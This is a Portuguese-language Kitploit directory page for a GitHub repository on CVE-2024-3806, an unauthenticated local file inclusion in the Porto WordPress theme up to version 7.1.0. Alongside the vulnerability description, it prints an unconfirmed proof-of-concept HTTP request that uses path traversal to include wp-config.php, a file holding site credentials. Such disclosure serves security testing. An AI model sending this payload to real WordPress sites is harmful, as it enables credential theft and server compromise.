Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-3806 — Porto <= 7.1.0 - Inclusão de Arquivo Local Não Autenticada via porto_ajax_posts | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-3806
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubrandomrobbiebf/cve-2024-3806

CVE-2024-3806

Porto <= 7.1.0 - Inclusão de Arquivo Local Não Autenticada via porto_ajax_posts

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-3806

Porto <= 7.1.0 - Inclusão de Arquivo Local Não Autenticada via porto_ajax_posts

Descrição

O tema Porto para WordPress é vulnerável à Inclusão de Arquivo Local em todas as versões até, e incluindo, 7.1.0 através da função 'porto_ajax_posts'. Isso possibilita que atacantes não autenticados incluam e executem arquivos arbitrários no servidor, permitindo a execução de qualquer código PHP nesses arquivos. Isso pode ser usado para bypassar controles de acesso, obter dados sensíveis ou alcançar execução de código em casos onde arquivos do tipo php podem ser enviados e incluídos.

POC não confirmado

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}

Notas

No momento, está retornando um erro 500.

Baixar ferramenta